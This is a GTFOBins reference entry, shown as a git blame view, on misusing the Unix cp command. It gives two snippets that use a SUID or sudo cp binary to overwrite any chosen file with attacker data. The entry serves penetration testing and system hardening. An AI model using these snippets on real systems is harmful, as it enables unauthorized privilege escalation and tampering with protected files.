GTFOBins.github.io/_gtfobins/cp.md

17 lines
391 B
Markdown
Raw Normal View History

2018-09-03 22:33:24 +02:00
---
2018-09-03 22:40:09 +02:00
description: This can be used to copy and then read or write files from a restricted file systems or with elevated privileges.
2018-09-03 22:33:24 +02:00
functions:
2018-10-05 19:55:38 +02:00
suid:
2018-09-03 22:33:24 +02:00
- code: |
LFILE=file_to_write
TF=$(mktemp)
echo "DATA" > $TF
./cp $TF $LFILE
2018-10-05 19:55:38 +02:00
sudo:
2018-09-03 22:33:24 +02:00
- code: |
LFILE=file_to_write
TF=$(mktemp)
echo "DATA" > $TF
sudo cp $TF $LFILE
---